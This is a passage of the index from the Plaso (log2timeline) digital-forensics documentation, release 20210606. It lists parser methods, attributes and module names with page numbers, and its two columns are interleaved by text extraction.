(plaso.parsers.opera.OperaGlobalHistoryParser(plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin method), 408 method), 268 ParseFileObject() (plaso.parsers.opera.OperaTypedHistoryParserParseLSQuarantineRow() method), 408 (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin ParseFileObject() (plaso.parsers.pe.PEParser method), 282 method), 409 ParseMessageRow() (plaso.parsers.sqlite_plugins.imessage.IMessagePlugin ParseFileObject() (plaso.parsers.plist.PlistParser method), 273 method), 410 ParseMessageRow() (plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin ParseFileObject() (plaso.parsers.pls_recall.PlsRecallParser method), 277 method), 411 ParseMessageRow() (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPlugin ParseFileObject() (plaso.parsers.recycler.WinRecycleBinParser method), 302 method), 417 ParseMessagesRow() (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin ParseFileObject() (plaso.parsers.recycler.WinRecyclerInfo2Parsermethod), 271 method), 417 ParseMetadataFile() ParseFileObject() (plaso.parsers.safari_cookies.BinaryCookieParser(plaso.engine.extractors.EventExtractor method), 418 method), 129 ParseFileObject() (plaso.parsers.spotlight_storedb.SpotlightStoreDatabaseParserParseNameSpace() (plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPlugin method), 432 method), 219 ParseFileObject() (plaso.parsers.systemd_journal.SystemdJournalParserParseNetworkConnectivityUsage() method), 444 (plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPlugin ParseFileObject() (plaso.parsers.text_parser.PyparsingMultiLineTextParsermethod), 227 method), 447 ParseNetworkDataUsage() ParseFileObject() (plaso.parsers.text_parser.PyparsingSingleLineTextParser(plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPlugin method), 447 method), 228 ParseFileObject() (plaso.parsers.utmp.UtmpParser ParseNotificationcenterRow() method), 452 (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin ParseFileObject() (plaso.parsers.utmpx.UtmpxParser method), 288 method), 453 ParseNumericOption() (plaso.cli.tools.CLITool ParseFileObject() (plaso.parsers.winevt.WinEvtParser method), 94

578 Index Plaso (log2timeline), Release 20210606

ParseOptions() (plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelperParseOptions() (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelper class method), 62 class method), 79 ParseOptions() (plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelperParseOptions() (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelper class method), 63 class method), 79 ParseOptions() (plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelperParseOptions() (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelper class method), 63 class method), 80 ParseOptions() (plaso.cli.helpers.data_location.DataLocationArgumentsHelperParseOptions() (plaso.cli.helpers.workers.WorkersArgumentsHelper class method), 64 class method), 80 ParseOptions() (plaso.cli.helpers.date_filters.DateFiltersArgumentsHelperParseOptions() (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelper class method), 65 class method), 81 ParseOptions() (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelperParseOptions() (plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelper class method), 65 class method), 82 ParseOptions() (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelperParseOptions() (plaso.cli.image_export_tool.ImageExportTool class method), 66 method), 84 ParseOptions() (plaso.cli.helpers.elastic_ts_output.ElasticTimesketchOutputArgumentsHelperParseOptions() (plaso.cli.log2timeline_tool.Log2TimelineTool class method), 66 method), 85 ParseOptions() (plaso.cli.helpers.event_filters.EventFiltersArgumentsHelperParseOptions() (plaso.cli.pinfo_tool.PinfoTool class method), 67 method), 86 ParseOptions() (plaso.cli.helpers.extraction.ExtractionArgumentsHelperParseOptions() (plaso.cli.psort_tool.PsortTool class method), 68 method), 87 ParseOptions() (plaso.cli.helpers.filter_file.FilterFileArgumentsHelperParseOptions() (plaso.cli.psteal_tool.PstealTool class method), 68 method), 89 ParseOptions() (plaso.cli.helpers.hashers.HashersArgumentsHelperParsePageVisitedRow() class method), 69 (plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin ParseOptions() (plaso.cli.helpers.interface.ArgumentsHelper method), 262 class method), 69 ParsePageVisitRow() ParseOptions() (plaso.cli.helpers.language.LanguageArgumentsHelper(plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqlite class method), 70 method), 293 ParseOptions() (plaso.cli.helpers.manager.ArgumentHelperManagerParsePartitionsTable() class method), 71 (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPlugin ParseOptions() (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelpermethod), 223 class method), 72 parser (plaso.containers.events.EventData attribute), ParseOptions() (plaso.cli.helpers.output_modules.OutputModulesArgumentsHelper104 class method), 72 parser_chain (plaso.containers.warnings.ExtractionWarning ParseOptions() (plaso.cli.helpers.parsers.ParsersArgumentsHelperattribute), 120 class method), 73 parser_chain (plaso.containers.warnings.RecoveryWarning ParseOptions() (plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelperattribute), 121 class method), 73 parser_filter_expression ParseOptions() (plaso.cli.helpers.profiling.ProfilingArgumentsHelper(plaso.containers.sessions.Session attribute), class method), 74 112 ParseOptions() (plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelperparser_filter_expression class method), 75 (plaso.containers.sessions.SessionConfiguration ParseOptions() (plaso.cli.helpers.status_view.StatusViewArgumentsHelperattribute), 115 class method), 75 parser_filter_expression ParseOptions() (plaso.cli.helpers.storage_format.StorageFormatArgumentsHelper(plaso.engine.configurations.ProcessingConfiguration class method), 76 attribute), 125 ParseOptions() (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelperParseReceiverData() class method), 76 (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin ParseOptions() (plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelpermethod), 290 class method), 77 ParseRecord() (plaso.parsers.apache_access.ApacheAccessParser ParseOptions() (plaso.cli.helpers.text_prepend.TextPrependArgumentsHelpermethod), 354 class method), 78 ParseRecord() (plaso.parsers.apt_history.APTHistoryLogParser ParseOptions() (plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelpermethod), 355 class method), 78 ParseRecord() (plaso.parsers.bash_history.BashHistoryParser

Index 579 Plaso (log2timeline), Release 20210606

method), 358 ParseRow() (plaso.parsers.networkminer.NetworkMinerParser ParseRecord() (plaso.parsers.dpkg.DpkgParser method), 404 method), 369 ParseRow() (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePlugin ParseRecord() (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParsermethod), 246 method), 376 ParseRow() (plaso.parsers.symantec.SymantecParser ParseRecord() (plaso.parsers.google_logging.GoogleLogParser method), 441 method), 378 ParseRow() (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser ParseRecord() (plaso.parsers.iis.WinIISParser method), 448 method), 381 ParseRow() (plaso.parsers.trendmicroav.OfficeScanWebReputationParser ParseRecord() (plaso.parsers.mac_appfirewall.MacAppFirewallParsermethod), 449 method), 385 ParserPreset (class in plaso.parsers.presets), 415 ParseRecord() (plaso.parsers.mac_securityd.MacOSSecuritydLogParserParserPresetsManager (class in method), 390 plaso.parsers.presets), 415 ParseRecord() (plaso.parsers.mac_wifi.MacWifiLogParserparsers (plaso.parsers.presets.ParserPreset attribute), method), 391 415 ParseRecord() (plaso.parsers.popcontest.PopularityContestParserparsers_counter (plaso.containers.sessions.Session method), 414 attribute), 112 ParseRecord() (plaso.parsers.santa.SantaParser parsers_counter (plaso.containers.sessions.SessionCompletion method), 423 attribute), 114 ParseRecord() (plaso.parsers.sccm.SCCMParser ParsersArgumentsHelper (class in method), 425 plaso.cli.helpers.parsers), 73 ParseRecord() (plaso.parsers.selinux.SELinuxParser ParsersManager (class in plaso.parsers.manager), 393 method), 426 ParseSearchRow() (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin ParseRecord() (plaso.parsers.setupapi.SetupapiLogParser method), 304 method), 428 ParseSMS() (plaso.parsers.sqlite_plugins.skype.SkypePlugin ParseRecord() (plaso.parsers.skydrivelog.SkyDriveLogParser method), 297 method), 429 ParseSmsRow() (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin ParseRecord() (plaso.parsers.skydrivelog.SkyDriveOldLogParser method), 243 method), 430 ParseStatusRow() (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin ParseRecord() (plaso.parsers.sophos_av.SophosAVLogParser method), 305 method), 431 ParseStatusRow() (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin ParseRecord() (plaso.parsers.syslog.SyslogParser method), 309 method), 443 ParseStringOption() (plaso.cli.tools.CLITool ParseRecord() (plaso.parsers.text_parser.PyparsingMultiLineTextParsermethod), 94 method), 447 ParseTCCEntry() (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin ParseRecord() (plaso.parsers.text_parser.PyparsingSingleLineTextParsermethod), 291 method), 448 ParseUserEngagedRow() ParseRecord() (plaso.parsers.vsftpd.VsftpdLogParser (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePlugin method), 454 method), 312 ParseRecord() (plaso.parsers.winfirewall.WinFirewallParserParseVideoRow() (plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin method), 459 method), 278 ParseRecord() (plaso.parsers.xchatlog.XChatLogParser ParseVolumeIdentifiersString() method), 466 (plaso.cli.storage_media_tool.StorageMediaToolMediator ParseRecord() (plaso.parsers.xchatscrollback.XChatScrollbackParsermethod), 90 method), 468 ParseZeitgeistEventRow() ParseRecord() (plaso.parsers.zsh_extended_history.ZshExtendedHistoryParser(plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePlugin method), 468 method), 314 ParserFilterExpressionHelper (class in ParseZHTMLSTRINGRow() plaso.filters.parser_filter), 163 (plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin ParserMediator (class in plaso.parsers.mediator), 397 method), 286 ParseRow() (plaso.parsers.dsv_parser.DSVParser partition_identifier method), 370 (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventData ParseRow() (plaso.parsers.mcafeeav.McafeeAccessProtectionParser attribute), 224 method), 396 partition_type (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventData

580 Index Plaso (log2timeline), Release 20210606

attribute), 224 attribute), 121 path (plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventDatapath_spec (plaso.containers.warnings.RecoveryWarning attribute), 364 attribute), 121 path (plaso.parsers.fseventsd.FseventsdEventData path_spec (plaso.engine.configurations.CredentialConfiguration attribute), 375 attribute), 123 path (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataPathArtifact (class in plaso.containers.artifacts), 99 attribute), 229 PathCollectionFiltersHelper (class in path (plaso.parsers.safari_cookies.SafariBinaryCookieEventData plaso.engine.path_filters), 135 attribute), 418 PathFilter (class in plaso.engine.path_filters), 135 path (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventDataPathFilterScanTree (class in plaso.filters.path_filter), attribute), 245 165 path (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventDataPathFilterScanTreeNode (class in attribute), 250 plaso.filters.path_filter), 165 path (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventDataPathHelper (class in plaso.engine.path_helper), 136 attribute), 259 paths (plaso.engine.path_filters.PathFilter attribute), path (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventData135 attribute), 269 PathSpecExtractor (class in plaso.engine.extractors), path (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventData129 attribute), 269 pe_type (plaso.parsers.pe.PEEventData attribute), 409 path (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventDataPEEventData (class in plaso.parsers.pe), 409 attribute), 282 PEParser (class in plaso.parsers.pe), 409 path (plaso.parsers.trendmicroav.TrendMicroAVEventData permission (plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventData attribute), 450 attribute), 363 path (plaso.parsers.winfirewall.WinFirewallEventData persistent (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventData attribute), 459 attribute), 250 path (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventDatapid (plaso.engine.processing_status.ProcessStatus attribute), 321 attribute), 140 path_hints (plaso.parsers.ntfs.NTFSFileStatEventData pid (plaso.parsers.asl.ASLEventData attribute), 356 attribute), 405 pid (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventData path_hints (plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 376 attribute), 463 pid (plaso.parsers.santa.SantaExecutionEventData at- path_segment_index (plaso.filters.path_filter.PathFilterScanTreeNodetribute), 419 attribute), 165 pid (plaso.parsers.santa.SantaFileSystemEventData at- path_segment_separator tribute), 420 (plaso.containers.artifacts.PathArtifact at- pid (plaso.parsers.selinux.SELinuxLogEventData attribute), 99 tribute), 426 path_segments (plaso.containers.artifacts.PathArtifact pid (plaso.parsers.syslog.SyslogLineEventData at- attribute), 99 tribute), 442 path_segments (plaso.filters.path_filter.PathFilterScanTreeNodepid (plaso.parsers.systemd_journal.SystemdJournalEventData property), 166 attribute), 444 path_separator (plaso.engine.path_filters.PathFilter PID (plaso.parsers.text_parser.PyparsingConstants at- attribute), 135 tribute), 446 path_spec (plaso.containers.artifacts.SourceConfigurationArtifactpid (plaso.parsers.utmp.UtmpEventData attribute), 452 attribute), 101 pid (plaso.parsers.utmpx.UtmpxMacOSEventData path_spec (plaso.containers.event_sources.EventSource attribute), 453 attribute), 104 pin_status (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData path_spec (plaso.containers.events.EventDataStream attribute), 229 attribute), 105 PinfoTool (class in plaso.cli.pinfo_tool), 85 path_spec (plaso.containers.storage_media.MountPoint places_title (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData attribute), 117 attribute), 265 path_spec (plaso.containers.tasks.Task attribute), 118 plaso path_spec (plaso.containers.warnings.ExtractionWarning module, 505 attribute), 120 plaso.analysis path_spec (plaso.containers.warnings.PreprocessingWarning module, 54

Index 581 Plaso (log2timeline), Release 20210606 plaso.analysis.browser_search plaso.analyzers.manager module, 39 module, 60 plaso.analysis.chrome_extension plaso.analyzers.yara_analyzer module, 40 module, 61 plaso.analysis.definitions plaso.cli module, 40 module, 97 plaso.analysis.hash_tagging plaso.cli.analysis_tool module, 40 module, 82 plaso.analysis.interface plaso.cli.extraction_tool module, 43 module, 82 plaso.analysis.logger plaso.cli.helpers module, 44 module, 82 plaso.analysis.manager plaso.cli.helpers.analysis_plugins module, 44 module, 62 plaso.analysis.mediator plaso.cli.helpers.artifact_definitions module, 45 module, 63 plaso.analysis.nsrlsvr plaso.cli.helpers.artifact_filters module, 46 module, 63 plaso.analysis.sessionize plaso.cli.helpers.data_location module, 48 module, 64 plaso.analysis.tagging plaso.cli.helpers.date_filters module, 48 module, 64 plaso.analysis.test_memory plaso.cli.helpers.dynamic_output module, 49 module, 65 plaso.analysis.unique_domains_visited plaso.cli.helpers.elastic_output module, 49 module, 66 plaso.analysis.viper plaso.cli.helpers.elastic_ts_output module, 50 module, 66 plaso.analysis.virustotal plaso.cli.helpers.event_filters module, 51 module, 67 plaso.analysis.windows_services plaso.cli.helpers.extraction module, 52 module, 67 plaso.analyzers plaso.cli.helpers.filter_file module, 62 module, 68 plaso.analyzers.hashers plaso.cli.helpers.hashers module, 59 module, 69 plaso.analyzers.hashers.entropy plaso.cli.helpers.interface module, 55 module, 69 plaso.analyzers.hashers.interface plaso.cli.helpers.language module, 55 module, 70 plaso.analyzers.hashers.manager plaso.cli.helpers.manager module, 56 module, 70 plaso.analyzers.hashers.md5 plaso.cli.helpers.nsrlsvr_analysis module, 57 module, 71 plaso.analyzers.hashers.sha1 plaso.cli.helpers.output_modules module, 58 module, 72 plaso.analyzers.hashers.sha256 plaso.cli.helpers.parsers module, 58 module, 73 plaso.analyzers.hashing_analyzer plaso.cli.helpers.process_resources module, 59 module, 73 plaso.analyzers.interface plaso.cli.helpers.profiling module, 59 module, 74 plaso.analyzers.logger plaso.cli.helpers.sessionize_analysis module, 60 module, 74

582 Index Plaso (log2timeline), Release 20210606 plaso.cli.helpers.status_view plaso.containers.event_sources module, 75 module, 104 plaso.cli.helpers.storage_format plaso.containers.events module, 76 module, 104 plaso.cli.helpers.tagging_analysis plaso.containers.interface module, 76 module, 108 plaso.cli.helpers.temporary_directory plaso.containers.manager module, 77 module, 109 plaso.cli.helpers.text_prepend plaso.containers.plist_event module, 77 module, 110 plaso.cli.helpers.vfs_backend plaso.containers.reports module, 78 module, 111 plaso.cli.helpers.viper_analysis plaso.containers.sessions module, 78 module, 111 plaso.cli.helpers.virustotal_analysis plaso.containers.shell_item_events module, 79 module, 116 plaso.cli.helpers.windows_services_analysis plaso.containers.storage_media module, 80 module, 117 plaso.cli.helpers.workers plaso.containers.tasks module, 80 module, 117 plaso.cli.helpers.xlsx_output plaso.containers.time_events module, 81 module, 119 plaso.cli.helpers.yara_rules plaso.containers.warnings module, 81 module, 120 plaso.cli.image_export_tool plaso.containers.windows_events module, 83 module, 121 plaso.cli.log2timeline_tool plaso.dependencies module, 84 module, 505 plaso.cli.logger plaso.engine module, 85 module, 154 plaso.cli.pinfo_tool plaso.engine.artifact_filters module, 85 module, 122 plaso.cli.psort_tool plaso.engine.configurations module, 87 module, 123 plaso.cli.psteal_tool plaso.engine.engine module, 88 module, 127 plaso.cli.status_view plaso.engine.extractors module, 89 module, 129 plaso.cli.storage_media_tool plaso.engine.filter_file module, 90 module, 130 plaso.cli.time_slices plaso.engine.filters_helper module, 91 module, 130 plaso.cli.tool_options plaso.engine.knowledge_base module, 92 module, 131 plaso.cli.tools plaso.engine.logger module, 93 module, 135 plaso.cli.views plaso.engine.path_filters module, 95 module, 135 plaso.containers plaso.engine.path_helper module, 122 module, 136 plaso.containers.analyzer_result plaso.engine.plaso_queue module, 97 module, 137 plaso.containers.artifacts plaso.engine.process_info module, 98 module, 138

Index 583 Plaso (log2timeline), Release 20210606 plaso.engine.processing_status plaso.formatters.winevt_rc module, 138 module, 175 plaso.engine.profilers plaso.formatters.winlnk module, 145 module, 176 plaso.engine.tagging_file plaso.formatters.winprefetch module, 147 module, 177 plaso.engine.worker plaso.formatters.winreg module, 147 module, 177 plaso.engine.yaml_filter_file plaso.formatters.yaml_formatters_file module, 148 module, 177 plaso.engine.zeromq_queue plaso.lib module, 149 module, 186 plaso.filters plaso.lib.bufferlib module, 167 module, 178 plaso.filters.event_filter plaso.lib.decorators module, 154 module, 179 plaso.filters.expression_parser plaso.lib.definitions module, 155 module, 179 plaso.filters.expressions plaso.lib.dtfabric_helper module, 156 module, 179 plaso.filters.file_entry plaso.lib.errors module, 157 module, 180 plaso.filters.filters plaso.lib.line_reader_file module, 160 module, 182 plaso.filters.logger plaso.lib.loggers module, 163 module, 183 plaso.filters.parser_filter plaso.lib.plist module, 163 module, 184 plaso.filters.path_filter plaso.lib.specification module, 165 module, 184 plaso.filters.value_types plaso.multi_process module, 166 module, 195 plaso.formatters plaso.multi_process.analysis_engine module, 178 module, 186 plaso.formatters.chrome plaso.multi_process.analysis_process module, 167 module, 187 plaso.formatters.chrome_preferences plaso.multi_process.base_process module, 167 module, 187 plaso.formatters.default plaso.multi_process.engine module, 168 module, 187 plaso.formatters.file_system plaso.multi_process.extraction_engine module, 168 module, 188 plaso.formatters.firefox plaso.multi_process.extraction_process module, 169 module, 188 plaso.formatters.interface plaso.multi_process.logger module, 169 module, 189 plaso.formatters.logger plaso.multi_process.output_engine module, 173 module, 189 plaso.formatters.manager plaso.multi_process.plaso_xmlrpc module, 173 module, 190 plaso.formatters.msiecf plaso.multi_process.rpc module, 174 module, 191 plaso.formatters.shell_items plaso.multi_process.task_engine module, 174 module, 192

584 Index Plaso (log2timeline), Release 20210606 plaso.multi_process.task_manager plaso.parsers.bash_history module, 192 module, 358 plaso.multi_process.task_process plaso.parsers.bencode_parser module, 194 module, 359 plaso.output plaso.parsers.bencode_plugins module, 211 module, 213 plaso.output.dynamic plaso.parsers.bencode_plugins.interface module, 195 module, 211 plaso.output.elastic plaso.parsers.bencode_plugins.transmission module, 195 module, 212 plaso.output.elastic_ts plaso.parsers.bencode_plugins.utorrent module, 195 module, 212 plaso.output.formatting_helper plaso.parsers.bsm module, 196 module, 360 plaso.output.interface plaso.parsers.chrome_cache module, 197 module, 361 plaso.output.json_line plaso.parsers.chrome_preferences module, 199 module, 363 plaso.output.json_out plaso.parsers.cookie_plugins module, 199 module, 216 plaso.output.kml plaso.parsers.cookie_plugins.ganalytics module, 200 module, 213 plaso.output.l2t_csv plaso.parsers.cookie_plugins.interface module, 200 module, 215 plaso.output.logger plaso.parsers.cookie_plugins.manager module, 201 module, 216 plaso.output.manager plaso.parsers.cups_ipp module, 201 module, 365 plaso.output.mediator plaso.parsers.custom_destinations module, 203 module, 366 plaso.output.null plaso.parsers.czip module, 205 module, 367 plaso.output.rawpy plaso.parsers.czip_plugins module, 206 module, 219 plaso.output.shared_dsv plaso.parsers.czip_plugins.interface module, 206 module, 216 plaso.output.shared_elastic plaso.parsers.czip_plugins.oxml module, 207 module, 217 plaso.output.shared_json plaso.parsers.docker module, 209 module, 367 plaso.output.tln plaso.parsers.dpkg module, 209 module, 369 plaso.output.xlsx plaso.parsers.dsv_parser module, 210 module, 370 plaso.parsers plaso.parsers.esedb module, 469 module, 371 plaso.parsers.android_app_usage plaso.parsers.esedb_plugins module, 352 module, 228 plaso.parsers.apache_access plaso.parsers.esedb_plugins.file_history module, 353 module, 219 plaso.parsers.apt_history plaso.parsers.esedb_plugins.interface module, 355 module, 220 plaso.parsers.asl plaso.parsers.esedb_plugins.msie_webcache module, 356 module, 221

Index 585 Plaso (log2timeline), Release 20210606 plaso.parsers.esedb_plugins.srum plaso.parsers.opera module, 224 module, 407 plaso.parsers.filestat plaso.parsers.pe module, 372 module, 409 plaso.parsers.firefox_cache plaso.parsers.plist module, 373 module, 410 plaso.parsers.fseventsd plaso.parsers.plist_plugins module, 375 module, 239 plaso.parsers.gdrive_synclog plaso.parsers.plist_plugins.airport module, 376 module, 232 plaso.parsers.google_logging plaso.parsers.plist_plugins.appleaccount module, 377 module, 232 plaso.parsers.iis plaso.parsers.plist_plugins.bluetooth module, 378 module, 233 plaso.parsers.interface plaso.parsers.plist_plugins.default module, 381 module, 233 plaso.parsers.java_idx plaso.parsers.plist_plugins.install_history module, 384 module, 233 plaso.parsers.logger plaso.parsers.plist_plugins.interface module, 385 module, 234 plaso.parsers.mac_appfirewall plaso.parsers.plist_plugins.ipod module, 385 module, 235 plaso.parsers.mac_keychain plaso.parsers.plist_plugins.launchd module, 386 module, 235 plaso.parsers.mac_securityd plaso.parsers.plist_plugins.macuser module, 389 module, 236 plaso.parsers.mac_wifi plaso.parsers.plist_plugins.safari module, 390 module, 236 plaso.parsers.mactime plaso.parsers.plist_plugins.softwareupdate module, 392 module, 237 plaso.parsers.manager plaso.parsers.plist_plugins.spotlight module, 393 module, 238 plaso.parsers.mcafeeav plaso.parsers.plist_plugins.spotlight_volume module, 395 module, 238 plaso.parsers.mediator plaso.parsers.plist_plugins.timemachine module, 397 module, 238 plaso.parsers.msiecf plaso.parsers.pls_recall module, 401 module, 410 plaso.parsers.networkminer plaso.parsers.plugins module, 403 module, 411 plaso.parsers.ntfs plaso.parsers.popcontest module, 404 module, 412 plaso.parsers.olecf plaso.parsers.presets module, 407 module, 415 plaso.parsers.olecf_plugins plaso.parsers.recycler module, 232 module, 416 plaso.parsers.olecf_plugins.automatic_destinationsplaso.parsers.safari_cookies module, 228 module, 418 plaso.parsers.olecf_plugins.default plaso.parsers.santa module, 230 module, 419 plaso.parsers.olecf_plugins.interface plaso.parsers.sccm module, 230 module, 424 plaso.parsers.olecf_plugins.summary plaso.parsers.selinux module, 231 module, 426

586 Index Plaso (log2timeline), Release 20210606 plaso.parsers.setupapi plaso.parsers.sqlite_plugins.mac_document_versions module, 427 module, 282 plaso.parsers.shared plaso.parsers.sqlite_plugins.mac_knowledgec module, 240 module, 284 plaso.parsers.shared.shell_items plaso.parsers.sqlite_plugins.mac_notes module, 239 module, 286 plaso.parsers.skydrivelog plaso.parsers.sqlite_plugins.mac_notificationcenter module, 428 module, 288 plaso.parsers.sophos_av plaso.parsers.sqlite_plugins.mackeeper_cache module, 431 module, 289 plaso.parsers.spotlight_storedb plaso.parsers.sqlite_plugins.macos_tcc module, 432 module, 291 plaso.parsers.sqlite plaso.parsers.sqlite_plugins.safari module, 434 module, 292 plaso.parsers.sqlite_plugins plaso.parsers.sqlite_plugins.skype module, 316 module, 294 plaso.parsers.sqlite_plugins.android_calls plaso.parsers.sqlite_plugins.tango_android module, 240 module, 300 plaso.parsers.sqlite_plugins.android_sms plaso.parsers.sqlite_plugins.twitter_android module, 243 module, 303 plaso.parsers.sqlite_plugins.android_webview plaso.parsers.sqlite_plugins.twitter_ios module, 245 module, 308 plaso.parsers.sqlite_plugins.android_webviewcacheplaso.parsers.sqlite_plugins.windows_timeline module, 246 module, 311 plaso.parsers.sqlite_plugins.appusage plaso.parsers.sqlite_plugins.zeitgeist module, 247 module, 314 plaso.parsers.sqlite_plugins.chrome_autofill plaso.parsers.symantec module, 248 module, 436 plaso.parsers.sqlite_plugins.chrome_cookies plaso.parsers.syslog module, 249 module, 441 plaso.parsers.sqlite_plugins.chrome_extension_activityplaso.parsers.syslog_plugins module, 251 module, 318 plaso.parsers.sqlite_plugins.chrome_history plaso.parsers.syslog_plugins.cron module, 253 module, 316 plaso.parsers.sqlite_plugins.firefox_cookies plaso.parsers.syslog_plugins.interface module, 259 module, 316 plaso.parsers.sqlite_plugins.firefox_downloadsplaso.parsers.syslog_plugins.ssh module, 260 module, 317 plaso.parsers.sqlite_plugins.firefox_history plaso.parsers.systemd_journal module, 262 module, 444 plaso.parsers.sqlite_plugins.gdrive plaso.parsers.text_parser module, 267 module, 445 plaso.parsers.sqlite_plugins.hangouts_messagesplaso.parsers.trendmicroav module, 270 module, 448 plaso.parsers.sqlite_plugins.imessage plaso.parsers.utmp module, 273 module, 451 plaso.parsers.sqlite_plugins.interface plaso.parsers.utmpx module, 275 module, 453 plaso.parsers.sqlite_plugins.kik_ios plaso.parsers.vsftpd module, 276 module, 454 plaso.parsers.sqlite_plugins.kodi plaso.parsers.winevt module, 278 module, 455 plaso.parsers.sqlite_plugins.ls_quarantine plaso.parsers.winevtx module, 281 module, 456

Index 587 Plaso (log2timeline), Release 20210606 plaso.parsers.winfirewall plaso.parsers.winreg_plugins.task_scheduler module, 458 module, 342 plaso.parsers.winjob plaso.parsers.winreg_plugins.terminal_server module, 460 module, 343 plaso.parsers.winlnk plaso.parsers.winreg_plugins.timezone module, 461 module, 344 plaso.parsers.winprefetch plaso.parsers.winreg_plugins.typedurls module, 463 module, 345 plaso.parsers.winreg_parser plaso.parsers.winreg_plugins.usb module, 464 module, 346 plaso.parsers.winreg_plugins plaso.parsers.winreg_plugins.usbstor module, 352 module, 347 plaso.parsers.winreg_plugins.amcache plaso.parsers.winreg_plugins.userassist module, 318 module, 348 plaso.parsers.winreg_plugins.appcompatcache plaso.parsers.winreg_plugins.windows_version module, 321 module, 349 plaso.parsers.winreg_plugins.bagmru plaso.parsers.winreg_plugins.winlogon module, 322 module, 350 plaso.parsers.winreg_plugins.bam plaso.parsers.winreg_plugins.winrar module, 323 module, 351 plaso.parsers.winreg_plugins.ccleaner plaso.parsers.winrestore module, 323 module, 464 plaso.parsers.winreg_plugins.default plaso.parsers.xchatlog module, 325 module, 465 plaso.parsers.winreg_plugins.interface plaso.parsers.xchatscrollback module, 325 module, 467 plaso.parsers.winreg_plugins.lfu plaso.parsers.zsh_extended_history module, 327 module, 468 plaso.parsers.winreg_plugins.mountpoints plaso.preprocessors module, 328 module, 478 plaso.parsers.winreg_plugins.mrulist plaso.preprocessors.interface module, 329 module, 469 plaso.parsers.winreg_plugins.mrulistex plaso.preprocessors.linux module, 331 module, 471 plaso.parsers.winreg_plugins.msie_zones plaso.preprocessors.logger module, 333 module, 472 plaso.parsers.winreg_plugins.network_drives plaso.preprocessors.macos module, 334 module, 472 plaso.parsers.winreg_plugins.networks plaso.preprocessors.manager module, 335 module, 473 plaso.parsers.winreg_plugins.officemru plaso.preprocessors.mediator module, 336 module, 474 plaso.parsers.winreg_plugins.outlook plaso.preprocessors.windows module, 337 module, 475 plaso.parsers.winreg_plugins.programscache plaso.serializer module, 337 module, 479 plaso.parsers.winreg_plugins.run plaso.serializer.interface module, 338 module, 478 plaso.parsers.winreg_plugins.sam_users plaso.serializer.json_serializer module, 339 module, 478 plaso.parsers.winreg_plugins.services plaso.serializer.logger module, 340 module, 479 plaso.parsers.winreg_plugins.shutdown plaso.single_process module, 341 module, 480

